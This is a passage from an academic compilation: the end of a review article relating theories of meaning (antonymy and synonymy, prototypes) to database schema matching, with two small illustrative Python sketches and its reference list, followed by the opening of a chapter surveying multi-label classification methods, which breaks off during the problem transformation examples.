Meaning as Opposition and Analogy According to Saussure (1966), human beings produce meaning by structuring word relations into patterns of contrariness and similarity, or opposition and analogy. Hence, the meaning of a term is defined as its relationship to opposite and analogous terms, that is, by its antonymy and synonymy relationships.
Application to Schema Matching
This theory can be exploited for instance-level as well as schema-level matching. On the instance level, it can help to establish similarity between instances or data values. On the schema level, such an approach can help establish similarity between schema elements. Most current research using lexical databases such as WordNet and Cyc only makes use of the synonymy relationships (Bergamaschi et al., 2001; Melnik
et al., 2002; Noy & Musen, 2001). However, other relationships between terms, especially antonymy, may also be required to determine meaning, and are available in lexical databases.
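The following sketch illustrates how synonymy and antonymy could be combined when comparing two schema terms; it is an illustration only, and the mini-lexicon is a hypothetical stand-in for a lexical database such as WordNet, with made-up entries and weights.

```python
# Hedged sketch: term similarity from both synonym-set and antonym-set overlap.
LEXICON = {
    "product": {"syn": {"article", "good", "merchandise"}, "ant": {"waste"}},
    "article": {"syn": {"product", "item", "piece"},       "ant": {"waste"}},
    "profit":  {"syn": {"gain", "earnings"},                "ant": {"loss"}},
}

def jaccard(a, b):
    return len(a & b) / len(a | b) if (a | b) else 0.0

def term_similarity(t1, t2, w_syn=0.7, w_ant=0.3):
    """Weighted combination of synonym overlap and antonym overlap."""
    e1, e2 = LEXICON[t1], LEXICON[t2]
    return w_syn * jaccard(e1["syn"] | {t1}, e2["syn"] | {t2}) \
         + w_ant * jaccard(e1["ant"], e2["ant"])

print(term_similarity("product", "article"))   # relatively high
print(term_similarity("product", "profit"))    # 0.0
```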
Research Opportunities Research questions arise as to the relative importance of these relationships to the similarity of meaning. For example, if two terms are synonymous but not antonymous to the same set of terms, how does this affect their similarity of meaning as judged by human users? How can other relationships, such as hypernymy (broader meaning) and hyponymy (narrower meaning) be exploited for schema-matching applications, and what is their importance to human users? Within hypernymy and hyponymy hierarchies, how can the basic level of categorization (Rosch, 1975) be identified, and is this level more important to human theories of meaning than other levels?
Prototype Theory of Meaning The main limitations of the theory of meaning as sense (feature theory of meaning) are its failure to explain graded membership in categories (e.g., penguins are birds even though they do not fly) and prototypicality effects (e.g., humans judge sparrows to be better examples of birds than penguins). These limitations gave rise to prototype theories (Rosch, 1973, 1975; Rosch & Mervis, 1975), in which the meaning of a term or concept is its (real or imaginary) prototype instance, that is, that instance that possesses most of the typical features. Highly salient features are used by humans to identify instances, but in contrast to feature-based theories, they do not define the concept (Hirsh-Pasek et al., 1993).
Application to Schema Matching
The prototype theory of meaning is applicable to instance-based matching methods. For example, a human user might identify prototypical instances of an entity type in one database. When these instances also occur in the second database, one might conclude that the two entity types are similar. For instance, if a prototypical product has length, width, and height of 3x5x10 feet, an instance-level matcher can analyze the occurrence of similar instances more easily than using strategies that require computations over all instances. Prototype instances need not actually exist. Imaginary prototypes, for example, for product, could be derived by finding the mean or median values of attributes Length, Width, and Height individually. While no single product possesses the combination of attribute values of the imaginary prototype, that combination of values defines the meaning of the term product. Instance-based techniques that work with aggregates such as means and medians implicitly apply the prototype theory of meaning (GLUE; Berlin & Motro, 2001; Chua et al., 2003; Kang & Naughton, 2003; Li & Clifton, 2000; Miller et al., 2001).
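To make the notion of an imaginary prototype concrete, the sketch below (an illustration only, not one of the surveyed matchers) derives attribute-wise median prototypes for two entity types and compares them; the attribute names and instance values are hypothetical.

```python
# Hedged sketch: imaginary prototypes as attribute-wise medians, then a simple
# normalized L1 distance over shared attributes (assumes at least one is shared).
from statistics import median

def prototype(instances):
    """instances: list of dicts with the same numeric attributes."""
    keys = instances[0].keys()
    return {k: median(row[k] for row in instances) for k in keys}

def prototype_distance(p1, p2):
    shared = p1.keys() & p2.keys()
    return sum(abs(p1[k] - p2[k]) for k in shared) / len(shared)

product_rows = [{"length": 3, "width": 5, "height": 10},
                {"length": 4, "width": 5, "height": 9}]
article_rows = [{"length": 3, "width": 6, "height": 10},
                {"length": 3, "width": 5, "height": 11}]
print(prototype_distance(prototype(product_rows), prototype(article_rows)))
```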
Research Opportunities While aggregate information is widely used in schema matching, questions as to how prototypes can be identified or computed remain unanswered. Given a particular distribution of instance values, how many prototypes can be identified, and are these prototypes useful when humans make similarity judgments based on them? Can clustering algorithms be used, and can cluster centers serve as prototypes that lead to schema-matching methods compatible with human expectations? How can multimodal value distributions be dealt with?
DISCUSSION
The previous section has introduced theories of meaning as an additional dimension along which to classify schema-matching methods. Table
2 summarizes the research surveyed here and positions it along this new dimension. While we have discussed the application of specific theories of meaning to schema matching and outlined research questions relevant to those theories, this section discusses the classification of existing methods that was carried out. Table 2 shows that the surveyed schema-matching methods are mainly classified as applications of the reference and feature theories of meaning. Based on this existing research, these two theories of meaning are well understood in schema matching. However, while much has been learned, there is room to further improve the precision and recall rates of schema-matching methods in these categories. Based on the reference and feature theories of meaning, we have outlined empirical research questions to this effect. Fewer existing schema-matching methods are found to apply the knowledge-based theory of meaning. These methods typically apply this theory of meaning locally rather than globally. Hence, we reiterate Rahm and Bernstein’s (2001) call for the use of graph isomorphism research in schema matching in connection with this theory of meaning. Graph isomorphism techniques can be used to identify globally similar schema structures. Table 2 shows that some theories of meaning have not yet been applied to schema matching. Prominent among these are the two pragmatist theories of meaning. We introduced these theories and sketched out possible applications to schema matching. Data about effects and intentions of statements, such as insert and update statements, can bring new information to bear on the problem of identifying the meaning of such statements, and the meaning of terms used in them. As outlined, established methods and tools exist to make use of this information with acceptable computational effort. The theory of meaning as opposites and analogies is another theory that appears to be easily applied to schema matching, yet has not been used. We sketched out what an application
of this theory might look like, and have shown that the necessary information is readily available in dictionaries, thesauri, and ontologies. Finally, the truth theory of meaning has yet to be applied to schema matching. However, in contrast to the pragmatist theories and meaning as opposites and analogies, the discussion shows that it is not easily applicable and that its operationalization requires further research. Filling the gaps and applying these theories of meaning can open up a new, theoretically well-founded direction for future schema-matching research. Examining the multitude of theories of meaning raises one important question: Which of these theories is used by human database integrators and would therefore be most promising for improving schema-matching methods? Current empirical results in psychology support later theories, especially knowledge-based theories, better than earlier theories such as prototype theory. This result might explain why methods that are based on earlier theories have precision and recall results substantially below 100%. However, no systematic study of the contribution of each of these theories in the context of human data-integration behavior has yet been done. Hence, important research questions are as yet unanswered: Do humans use only a single theory of meaning? If so, can they switch theories of meaning depending on context? Why do they switch theories? If they use multiple theories, what are the relative contributions of each theory to a human’s similarity judgment? Also, if they use multiple theories, are the theories independent; that is, is the final similarity judgment a linear function of judgments based on different theories of meaning? Do different types of users apply different theories? For example, do database administrators employ different theories of meaning from business users of a database system? If that were the case, one might expect difficulties in data integration projects. Indicative answers to some of these questions are provided by the empirical evaluations of the existing schema-matching methods. However, these are limited to investi-
gating a particular method and cannot substitute for rigorous, theory-driven investigations that are required to address these questions.
CONCLUSION
The novel contribution of this review article is the proposition that theories of meaning, originating in the reference disciplines of philosophy, psychology, and cognitive science, are relevant to IS research in schema matching. We first set out the three aims of this article: to provide a new conceptualization and theoretical foundation for schema matching, to use this foundation for positioning and examining existing research, and to point out avenues and opportunities for future research. To accomplish these aims, the article made three specific and novel contributions. First, it proposed theories of meaning as a possible theoretical foundation. Second, it introduced theories of meaning from well-established reference disciplines, used these to examine existing schema-matching methods, sketched out how they might be applied, and raised a number of empirical research questions in connection with each theory. Finally, it discussed the positioning of existing schema-matching research and raised further research questions based on the identified gaps in the application of theories of meaning. The research issues identified show that the proposed conceptualization and theoretical foundation are useful to the advancement of the field. The article is based on the premise that every human being holds a theory of meaning, albeit often implicitly. Hence, the aim of this article is not to choose an appropriate theory of meaning, but rather to encourage schema-matching researchers to use empirical studies to identify and explicate the theories of meaning held by database integrators so that schema-matching methods can be improved based on theoretical guidance and empirical knowledge.
The findings of this article may be applicable beyond the database area. In a broader sense, schema matching is a prerequisite also for ontology alignment on the Semantic Web (Hakimpour & Geppert, 2001; Jeong & Hsu, 2001) and translations between modeling languages via metamodels (Davies, Green, Milton, & Rosemann, 2003; Rosemann & Green, 2000, 2002). The specific implications of the presented theories of meaning for these types of schemata are left for future investigations to explore.
REFERENCES Agrawal, R., Imielinski, T., & Swami, A. (1993). Mining association rules between sets of items in large databases. In Proceedings of the ACM SIGMOD Conference on Management of Data, Washington, DC (pp. 207-216). Austin, J. (1962). How to do things with words. Cambridge, MA: Harvard University Press. Bajaj, A., & Ram, S. (2003). IAIS: A methodology to enable inter-agency information sharing in eGovernment. Journal of Database Management, 14(4), 59. Ball, T., & Larus, J. R. (1994). Optimally profiling and tracing programs. ACM Transactions on Programming Languages and Systems, 16(4), 1319-1360. Batini, C., Lenzerini, M., & Navathe, S. (1986). A comparative analysis of methodologies for database schema integration. ACM Computer Surveys, 18(4), 323-364. Bergamaschi, S., Castano, S., & Vincini, M. (1999). Semantic integration of semistructured and structured data sources. ACM SIGMOD Record, 28(1), 54-59. Bergamaschi, S., Castano, S., Vincini, M., & Beneventano, D. (2001). Semantic integration of
heterogeneous information sources. Data and Knowledge Engineering, 36, 215-249. Berlin, J., & Motro, M. (2001). Autoplex: Automated discovery of content for virtual databases. In Proceedings of CoopIS 2001 (pp. 108-122). Berlin, J., & Motro, M. (2002). Database schema matching using machine learning with feature selection. In Proceedings of CAISE 2002, Toronto, Ontario, Canada (pp. 452-466). Bertino, E., Guerrini, G., & Mesiti, M. (2004). A matching algorithm for measuring the structural similarity between an XML document and a DTD and its applications. Information Systems, 29, 23-46. Biskup, J., & Convent, B. (1986). A formal view integration method. In Proceedings of the 1986 ACM SIGMOD International Conference on Management of Data, Washington, DC (pp. 398-407). Biskup, J., & Embley, D. W. (2003). Extracting information from heterogeneous information sources using ontologically specified target views. Information Systems, 28, 169-212. Bright, M., Hurson, A., & Pakzad, S. (1994). Automated resolution of semantic heterogeneity in multidatabases. ACM Transactions on Database Systems, 19(2), 212-253. Casanova, M., & Vidal, V. (1983). Towards a sound view integration methodology. In Proceedings of the Second ACM SIGACT-SIGMOD Symposium on Principles of Database Systems (pp. 36-47). Castano, S., & De Antonellis, V. (1999). A schema analysis and reconciliation tool environment for heterogeneous databases. In Proceedings of the IEEE IDEAS’99 International Database Engineering and Applications Symposium, Montreal, Quebec, Canada (pp. 53-62).
Castano, S., De Antonellis, V., & De Capitani di Vimercati, S. (2001). Global viewing of heterogeneous data sources. IEEE Transactions on Knowledge and Data Engineering, 13(2), 277-297. Chua, C. E. H., Chiang, R. H., & Lim, E.-P. (2003). Instance-based attribute identification in database integration. The VLDB Journal, 12(3), 228-243. Cohen, G. (2005). Using bytecode transformation to integrate new features. In R. E. Filman et al. (Eds.), Aspect-oriented software development. Boston: Addison-Wesley. Cohen, W. W. (1998). Integration of heterogeneous databases without common domains using queries based on textual similarity. In Proceedings of the 1998 ACM SIGMOD International Conference on Management of Data (pp. 201-212). Cohen, W. W. (2000). Data integration using similarity joins and a word-based information representation language. ACM Transactions on Information Systems, 18(3), 288-321. Collins, A., & Loftus, E. (1975). A spreading activation theory of semantic processing. Psychological Review, 82, 407-428. Collins, A., & Quillian, M. (1969). Retrieval time from semantic memory. Journal of Verbal Learning and Verbal Behavior, 8, 240-248. Corneil, D., & Gotlieb, C. (1970). An efficient algorithm for graph isomorphism. Journal of the Association for Computing Machinery, 17(1), 51-64. Davidson, D. (1986). A coherence theory of truth and knowledge. In E. LePore (Ed.), Truth and interpretation: Perspectives on the philosophy of Donald Davidson. Oxford, United Kingdom: Basil Blackwell. Davies, I., Green, P., Milton, S., & Rosemann, M. (2003, June 15-17). Using meta models for the
comparison of ontologies. In Proceedings of the Eighth CAiSE/IFIP8.1 International Workshop on Evaluation of Modeling Methods in Systems Analysis and Design (EMMSAD’03), Velden, Austria.
Gopnik, A. (2001). Theories, language and culture. In M. Bowerman & S. C. Levinson (Eds.), Language acquisition and conceptual development (pp. 45-69). Cambridge, United Kingdom: Cambridge University Press.
Dewey, J. (1958). Experience and nature. New York: Dover.
Gopnik, A., & Wellman, H. (1994). The “theory theory.” In L. Hirschfield & S. Gelman (Eds.), Mapping the mind: Domain specificity in culture and cognition (pp. 257-293). New York: Cambridge University Press.
Doan, A. (2005). Illinois semantic integration archive. Retrieved from http://anhai.cs.uius. edu/archive Doan, A., Domingos, P., & Halevy, A. Y. (2001). Reconciling schemas of disparate data sources: A machine-learning approach. In Proceedings of the 2001 ACM SIGMOD International Conference on Management of Data. Doan, A., Madhavan, J., Dhamankar, R., Domingos, P., & Halevy, A. (2003). Learning to match ontologies on the Semantic Web. The VLDB Journal, 12, 303-319. Doan, A., Madhavan, J., Domingos, P., & Halevy, A. (2002). Learning to map between ontologies on the Semantic Web. In Proceedings of WWW2002, Honolulu, HI (pp. 662-673). Dummett, M. (1993). What do I know when I know a language? In The seas of language. Oxford, United Kingdom: Clarendon Press. Ewens, W. J., & Grant, G. R. (2001). Statistical methods in bioinformatics. New York: Springer Verlag. Fayyad, U. M., Piatetsky-Shapiro, G., Smyth, P., & Uthurusamy, R. (Eds.). (1996). Advances in knowledge discovery and data mining. Cambridge, MA: MIT Press. Fellbaum, C. (1998). WordNet: An electronic lexical database. Cambridge, MA: The MIT Press. Frege, G. (1980). On sense and reference. In P. Geach & M. Black (Eds.), Translations from the philosophical writings of Gottlob Frege (3rd ed., pp. 56-78). Blackwell Publishers.
Gotthard, W., Lockemann, P. C., & Neufeld, A. (1992). System-guided view integration for object-oriented databases. IEEE Transactions on Knowledge and Data Engineering, 4(1), 1-22. Grice, H. (1989). Meaning. In Studies in the way of words. Cambridge, MA: Harvard University Press. Guha, R., & Lenat, D. B. (1994). Enabling agents to work together. Communications of the ACM, 37(7), 127-142. Habermas, J. (1979). Communication and the evolution of society. Boston: Beacon Press. Habermas, J. (1981). The theory of communicative action (Vol. 1, T. McCarty, Trans.). Boston: Beacon Press. Haerder, T., & Reuter, A. (1983). Principles of transaction-oriented database recovery. ACM Computing Surveys, 15(4), 287-317. Hakimpour, F., & Geppert, A. (2001). Resolving semantic heterogeneity in schema integration. In Proceedings of the International Conference on Formal Ontology in Information Systems (pp. 297-308). Hamou-Lhdaj, A., & Lethbridge, T. C. (2004). A survey of trace exploration tools and techniques. In Proceedings of the 2004 Conference of the Centre for Advanced Studies on Collaborative Research, Markham, Ontario, Canada (pp. 42-55).
Hayne, S., & Ram, S. (1990). Multi-user view integration system (MUVIS): An expert system for view integration. In Proceedings of the Sixth International Conference on Data Engineering (pp. 402-409). Hilbert, D. M., & Redmiles, D. F. (2000). Extracting usability information from user interface events. ACM Computing Surveys, 32(4), 384-421. Hipp, J., Güntzer, U., & Nakhaeizadeh, G. (2000). Algorithms for association rule mining: A general survey and comparison. ACM SIGKDD Exploration Newsletter, 2(1), 58-64. Hirsh-Pasek, K., Reeves, L. M., & Golinkoff, R. (1993). Words and meaning: From primitives to complex organization. In J. Gleason & N. Ratner (Eds.), Psycholinguistics (pp. 133-197). Orlando, FL: Holt, Rinehart, &Winston. Jeong, E., & Hsu, C.-N. (2001). Induction of integrated view for XML data with heterogeneous DTDs. In Proceedings of the Tenth International Conference on Information and Knowledge Management (pp. 151-158). Kang, J., & Naughton, J. F. (2003, June 9-12). On schema matching with opaque column names and data values. In Proceedings of SIGMOD 2003, San Diego, CA (pp. 205-216). Keil, F., Smith, W. C., Simons, D. J., & Levin, D. T. (1998). Two dogmas of conceptual empiricism: Implications for hybrid models of the structure of knowledge. Cognition, 65(2), 263-297. Korf, I., Yandell, M., & Bedell, J. (2003). BLAST. Sebastopol, CA: O’Reilly. Kripke, S. (1980). Naming and necessity. Oxford, United Kingdom: Blackwell. Lakatos, I. (1978). Philosophical papers. Cambridge, United Kingdom: Cambridge University Press.
Larson, J., Navathe, S., & Elmasri, R. (1989). A theory of attribute equivalence in databases with application to schema integration. IEEE Transactions on Software Engineering, 15(4), 449-463. Lenat, D. B. (1995). CYC: A large-scale investment in knowledge infrastructure. Communications of the ACM, 38(11), 33-38. Lenat, D. B., Guha, R. V., Pittman, K., Pratt, D., & Shepherd, M. (1990). CYC: Toward programs with common sense. Communications of the ACM, 33(8), 30-49. Lerner, B. S. (2000). A model for compound type changes encountered in schema evolution. ACM Transactions on Database Systems, 25(1), 83-127. Li, W.-S., & Clifton, C. (1996). Dynamic integration in multidatabase systems. Journal of Database Management, 7(1), 28-40. Li, W.-S., & Clifton, C. (2000). SEMINT: A tool for identifying attribute correspondences in heterogeneous databases using neural networks. Data and Knowledge Engineering, 33, 49-84. Li, W.-S., Clifton, C., & Liu, S.-Y. (2000). Database integration using neural networks: Implementation and experiences. Knowledge and Information Systems, 2(1), 73-96. Lueker, G. S., & Booth, K. S. (1979). A linear time algorithm for deciding interval graph isomorphism. Journal of the Association for Computing Machinery, 26(2), 183-195. Mannino, M. V., Chu, P., & Sager, T. (1988). Statistical profile estimation in database systems. ACM Computing Surveys, 20(3), 191-221. McNamara, T. P., & Miller, D. L. (1989). Attributes of theories of meaning. Psychological Bulletin, 106(3), 355-376.
Melnik, S., Garcia-Molina, H., & Rahm, E. (2002). Similarity flooding: A versatile graph matching algorithm and its application to schema matching. In Proceedings of the 18th International Conference on Data Engineering (ICDE’02) (pp. 117-128). Miller, R. J., Hernandez, M. A., Haas, L. M., Yan, L., Ho, C. H., Fagin, R., et al. (2001). The Clio project: Managing heterogeneity. ACM SIGMOD Record, 30(1), 78-83. Mitra, P., Wiederhold, G., & Kersten, M. (2000). A graph-oriented model for articulation of ontology interdependencies. In Proceedings of the Seventh International Conference on Extending Database Technology EDBT (pp. 86-100). Murphy, G. L. (2002). The big book of concepts. Cambridge, MA: The MIT Press. Murphy, P. (1985). Meaning, truth and ethical value (Part 1). Praxis International, 5(3), 224246.
International Conference on Information and Knowledge Management (pp. 306-313). Palopoli, L., Sacca, D., & Ursino, D. (1998b). Semi-automatic semantic discovery of properties from database schemes. In Proceedings of the International Database Engineering and Applications Symposium (pp. 244-253). Paton, N. W. (Ed.). (1998). Active rules in database systems. New York: Springer Verlag. Paton, N. W., & Diaz, O. (1999). Active database systems. ACM Computing Surveys, 31(1), 63-103. Putnam, H. (1975). The meaning of meaning. In Mind, language and reality: Philosophical papers (Vol. 1). Cambridge, United Kingdom: Cambridge University Press. Putnam, H. (1981). Reason, truth and history. Cambridge, United Kingdom: Cambridge University Press.
Murphy, P. (1987). Meaning, truth and ethical value (Part 2). Praxis International, 7(1), 35-56.
Quine, W. v. O. (1953). Two dogmas of empiricism. In From a logical point of view. Cambridge, MA: Harvard University Press.
Noy, N., & Musen, M. (2001). Anchor-PROMPT: Using non-local context for semantic matching. In Workshop on Ontologies and Information Sharing at the Seventh International Joint Conference on Artificial Intelligence IJCAI, Seattle, WA.
Rahm, E., & Bernstein, P. A. (2001). A survey of approaches to automatic schema matching. The International Journal on Very Large Databases, 10(4), 334-350.
Noy, N., & Musen, M. (2003). The PROMPT suite: Interactive tools for ontology merging and mapping. International Journal of Human-Computer Studies, 59(6), 983-1024. Palopoli, L., Sacca, D., Terracina, G., & Ursino, D. (2003). Uniform techniques for deriving similarities of objects and subschemas in heterogeneous databases. IEEE Transactions on Knowledge and Data Engineering, 15(2), 271-294. Palopoli, L., Sacca, D., & Ursino, D. (1998a). An automatic technique for detecting type conflicts in database schema. In Proceedings of the Seventh
Ramakrishnan, R., & Gehrke, J. (2003). Database management systems (3rd ed.). Boston: McGrawHill. Rescher, N. (1973). The coherence theory of truth. Oxford, United Kingdom: Oxford University Press. Ricoeur, P. (1976). Interpretation theory: Discourse and the surplus of meaning. Fort Worth, TX: The Texas Christian University Press. Ricoeur, P. (1977). The rule of metaphor. Toronto, Ontario, Canada: University of Toronto Press.
Ricoeur, P. (1978). The philosophy of Paul Ricoeur: An anthology of his work. Boston: Beacon Press. Rosaci, D., Terracina, G., & Ursino, D. (2001). Deriving sub-source similarities from heterogeneous, semi-structured information sources. In Proceedings of the Ninth International Conference on Cooperative Information Systems (CoopIS) (pp. 163-178). Rosch, E. (1973). On the internal structure of perceptual and semantic categories. In T. Moore (Ed.), Cognitive development and the acquisition of language. New York: Academic Press. Rosch, E. (1975). Cognitive representations of semantic categories. Journal of Experimental Psychology: General, 104, 192-233. Rosch, E., & Mervis, C. (1975). Family resemblances: Studies in the internal structure of categories. Cognitive Psychology, 7, 573-605. Rosemann, M., & Green, P. (2000). Integrating multi-perspective views into ontological analysis. In Proceedings of the 21st International Conference on Information Systems (pp. 618-627). Rosemann, M., & Green, P. (2002). Developing a meta-model for the Bunge-Wand-Weber ontological constructs. Information Systems, 27(2), 75-91. Russell, B. (1905). On denoting. Mind, 14, 479493. Russell, B. (1956). Descriptions and incomplete symbols. In Logic and knowledge: Essays, 19011950. London: Allen & Unwin. Sanderson, P. M., & Fisher, C. (1994). Exploratory sequential data analysis: Foundations. Human Computer Interaction, 9. Saussure, F. (1966). Course in general linguistics. New York: McGraw-Hill.
Scheuermann, P., Li, W.-S., & Clifton, C. (1996). Dynamic integration and query processing with ranked role sets. In Proceedings of the First IFCIS International Conference on Cooperative Information Systems (pp. 157-166). Searle, J. (1969). Speech acts. Cambridge, United Kingdom: Cambridge University Press. Sowa, J. F. (1984). Conceptual structures: Information processing in mind and machine. Reading, MA: Addison-Wesley. Sowa, J. F. (2000). Knowledge representation: Logical, philosophical, and computational foundations. Pacific Grove, CA: Brooks Cole. Spaccapietra, S., & Parent, C. (1994). View integration: A step forward in solving structural conflicts. IEEE Transactions on Knowledge and Data Engineering, 6(2). 258-274. Strawson, P. (1950). On referring. Mind, 59, 320-344. Su, X., Brasethvik, T., & Hakkarainen, S. (2003). Ontology mapping through analysis of model extension. In Proceedings of the Forum of the 11th International Conference on Advances in Information Systems Engineering (CAiSE), Velden, Austria. Su, X., & Gulla, J. A. (2004). Semantic enrichment for ontology mapping. In Proceedings of the Ninth International Conference on Applications of Natural Language to Information Systems (pp. 217-228). Su, X., Gulla, J. A. (2006). An information retrieval approach to ontology mapping. Data & Knowledge Engineering, 58(1), 47-69. Su, X., Hakkarainen, S., & Brasethvik, T. (2004). Semantic enrichment for improving system interoperability. In Proceedings of the 19th ACM Symposium on Applied Computing (SAC 04), Nicosia, Cyprus (pp. 1634-1641).
Sure, Y., Corcho, O., Euzenat, J., & Hughes, T. (Eds.). (2004, November). In Third International Workshop on Evaluation of Ontology-Based Tools, Hiroshima, Japan.
Weber, R. (1997). Ontological foundations of information systems. Coopers & Lybrand. Weber, R. (2003). Still desperately seeking the IT artifact. MIS Quarterly, 27(2), iii-xi.
Tarski, A. (1935). The concept of truth in formalized languages. In Logic, semantics, metamathematics (2nd ed., pp. 152-278). Indianapolis, IN: Hacket.
Webster, J., & Watson, R. T. (2002). Analyzing the past to prepare for the future: Writing a literature review. MIS Quarterly, 26(2), xiii-xxiii.
Toulmin, S. (1958). The uses of argument. Cambridge, United Kingdom: Cambridge University Press.
Wieringa, R. J. (1999). Design methods for reactive systems: Yourdon, Statemate and the UML (Tech. Rep.). The Netherlands: University of Twente, Department of Computer Science.
Ullmann, J. (1976). An algorithm for subgraph isomorphism. Journal of the Association for Computing Machinery, 23(1), 31-42.
Wittgenstein, L. (1953). Philosophical investigations. Englewood Cliffs, NJ: Prentice Hall.
Wand, Y., & Weber, R. (1990). Mario Bunge’s ontology as a formal foundation for information systems concepts. In P. Weingartner & G. J. W. Dorn (Eds.), Studies on Mario Bunge’s treatise. Atlanta, GA: Rodopi. Wand, Y., & Weber, R. (2002). Research commentary: Information systems and conceptual modeling. A research agenda. Information Systems Research, 13(4), 363-376. Wang, T.-L. J., Zhang, K., Jeong, K., & Shasha, D. (1994). A system for approximate tree matching. IEEE Transactions on Knowledge and Data Engineering, 6(4), 559-571. Wang, T.-W., & Murphy, K. E. (2004). Semantic heterogeneity in multidatabase systems: A review and a proposed meta-data structure. Journal of Database Management, 15(4), 71-87.
Yeh, P. Z., Porter, B., & Barker, K. (2003). Using transformations to improve semantic matching. In Proceedings of K-CAP’03, Sanibel Island, FL (pp. 180-189). Young, J. (2001). A defence of the coherence theory of truth. The Journal of Philosophical Research, 26, 89-101. Zhang, X., & Gupta, R. (2005). Whole execution traces and their applications. ACM Transactions on Architecture and Code Optimization, 2(3), 301-334. Zhao, H., & Ram, S. (2004). Clustering schema elements for semantic integration of heterogeneous data sources. Journal of Database Management, 15(4), 88-106.
This work was previously published in Journal of Database Management, Vol. 19, Issue 3, edited by K. Siau, pp. 55-82, copyright 2008 by IGI Publishing (an imprint of IGI Global).
Chapter 1.21
Multi-Label Classification: An Overview
Grigorios Tsoumakas Aristotle University of Thessaloniki, Greece Ioannis Katakis Aristotle University of Thessaloniki, Greece
ABSTRACT Multi-label classification methods are increasingly required by modern applications, such as protein function classification, music categorization, and semantic scene classification. This article introduces the task of multi-label classification, organizes the sparse related literature into a structured presentation and performs comparative experimental results of certain multi-label classification methods. It also contributes the definition of concepts for the quantification of the multi-label nature of a data set.
INTRODUCTION Traditional single-label classification is concerned with learning from a set of examples that are associated with a single label l from a set of disjoint labels L, |L| > 1. If |L| = 2, then the learning
problem is called a binary classification problem (or filtering, in the case of textual and Web data), while if |L| > 2, then it is called a multiclass classification problem. In multi-label classification, the examples are associated with a set of labels Y ⊆ L. In the past, multi-label classification was mainly motivated by the tasks of text categorization and medical diagnosis. Text documents usually belong to more than one conceptual class. For example, a newspaper article concerning the reactions of the Christian church to the release of the Da Vinci Code film can be classified into both of the categories society\religion and arts\movies. Similarly, in medical diagnosis, a patient may be suffering, for example, from diabetes and prostate cancer at the same time. Nowadays, we notice that multi-label classification methods are increasingly required by modern applications, such as protein function classification (Elisseeff & Weston, 2002), music
categorization (Li & Ogihara, 2003), and semantic scene classification (Boutell, Luo, Shen, & Brown, 2004). In semantic scene classification, a photograph can belong to more than one conceptual class at the same time, such as sunsets and beaches. Similarly, in music categorization, a song may belong to more than one genre. For example, several hit songs of the popular rock band Scorpions can be characterized as both rock and ballad. This article aims to serve as a starting point and reference for researchers interested in multilabel classification. The main contributions are: a) a structured presentation of the sparse literature on multi-label classification methods with comments on their relative strengths and weaknesses, and, when possible, the abstraction of specific methods to more general and thus more useful schemata; b) the introduction of an undocumented multi-label method; c) the definition of a concept for the quantification of the multi-label nature of a data set; and d) preliminary comparative experimental results about the performance of certain multi-label methods. The remainder of the article is organized as follows. The next section discusses tasks that are related to multi-label classification. Subsequently follows an organized presentation of multi-label classification methods. The next section introduces the concept of label density, and presents the metrics that have been proposed in the past for the evaluation of multi-label classifiers. The following section presents the comparative experiments and discusses the results, while the concluding section summarizes this work and points to future research directions.
RELATED TASKS A task that also belongs to the general family of supervised learning and is very relevant to multi-label classification is that of ranking. In ranking, the task is to order a set of labels L, so
310
that the topmost labels are more related to the new instance. There exist a number of multi-label classification methods that learn a ranking function from multi-label data. However, a ranking of labels requires postprocessing in order to give a set of labels, which is the proper output of a multi-label classifier. In certain classification problems, the labels belong to a hierarchical structure. The dmoz open directory, for example (http://www.dmoz.org/), maintains a hierarchy of conceptual classes for the categorization of Web pages. A Web page may be labelled using one or more of those classes, which can belong to different levels of the hierarchy. The top level of the Munich Information Centre for Protein Sequences (MIPS) hierarchy (http://mips. gsf.de/) consists of classes, such as metabolism, energy, transcription, and protein synthesis. Each of these classes is then subdivided into more specific classes, and these are in turn subdivided, and then again subdivided, so the hierarchy is up to four levels deep (Clare & King, 2001). When the labels in a data set belong to a hierarchical structure, then we call the task hierarchical classification. If each example is labelled with more than one node of the hierarchical structure, then the task is called hierarchical multi-label classification. In this article, we focus on flat (nonhierarchical) multi-label classification methods. Jin and Ghahramani (2002) call multiple-label problems, the semisupervised classification problems, where each example is associated with more than one class, but only one of those classes is the true class of the example. This task is not that common in real-world applications as the one we are studying. Multiple-instance learning is a variation of supervised learning, where the task is to learn a concept given positive and negative bags of instances (Maron & Lozano-Perez, 1997). Each bag may contain many instances, but a bag is labelled positive even if only one of the instances in it falls within the concept. A bag is labelled negative only if all the instances in it are negative.
Multi-Label Classification
MULTI-LABEL CLASSIFICATION METHODS
We can group the existing methods for multi-label classification into two main categories: a) problem transformation methods and b) algorithm adaptation methods. We define problem transformation methods as those methods that transform the multi-label classification problem either into one or more single-label classification or regression problems, for both of which there exists a huge bibliography of learning algorithms. We define algorithm adaptation methods as those methods that extend specific learning algorithms in order to handle multi-label data directly.

Problem Transformation Methods

To exemplify these methods we will use the data set of Table 1. It consists of four examples (documents in this case) that belong to one or more of four classes: sports, religion, science, and politics.

Table 1. Example of a multi-label data set

| Example | Sports | Religion | Science | Politics |
|---------|--------|----------|---------|----------|
| 1       | X      |          |         | X        |
| 2       |        |          | X       | X        |
| 3       | X      |          |         |          |
| 4       |        | X        | X       |          |

There exist two straightforward problem transformation methods that force the learning problem into traditional single-label classification (Boutell et al., 2004). The first one (dubbed PT1) subjectively or randomly selects one of the multiple labels of each multi-label instance and discards the rest, while the second one (dubbed PT2) simply discards every multi-label instance from the multi-label data set. Tables 2 and 3 show the transformed data set using methods PT1 and PT2, respectively. These two problem transformation methods discard a lot of the information content of the original multi-label data set and, therefore, are not considered further in this work.

Table 2. Transformed data set using PT1 (one possible outcome, since PT1 retains a single, arbitrarily chosen label per example)

| Example | Sports | Religion | Science | Politics |
|---------|--------|----------|---------|----------|
| 1       | X      |          |         |          |
| 2       |        |          | X       |          |
| 3       | X      |          |         |          |
| 4       |        | X        |         |          |

Table 3. Transformed data set using PT2

| Example | Sports | Religion | Science | Politics |
|---------|--------|----------|---------|----------|
| 3       | X      |          |         |          |

Table 4. Transformed data set using PT3

| Example | Sports | (Sports ∧ Politics) | (Science ∧ Politics) | (Science ∧ Religion) |
|---------|--------|---------------------|----------------------|----------------------|
| 1       |        | X                   |                      |                      |
| 2       |        |                     | X                    |                      |
| 3       | X      |                     |                      |                      |
| 4       |        |                     |                      | X                    |

The third problem transformation method that we will mention (dubbed PT3) considers each different set of labels that exist in the multi-label
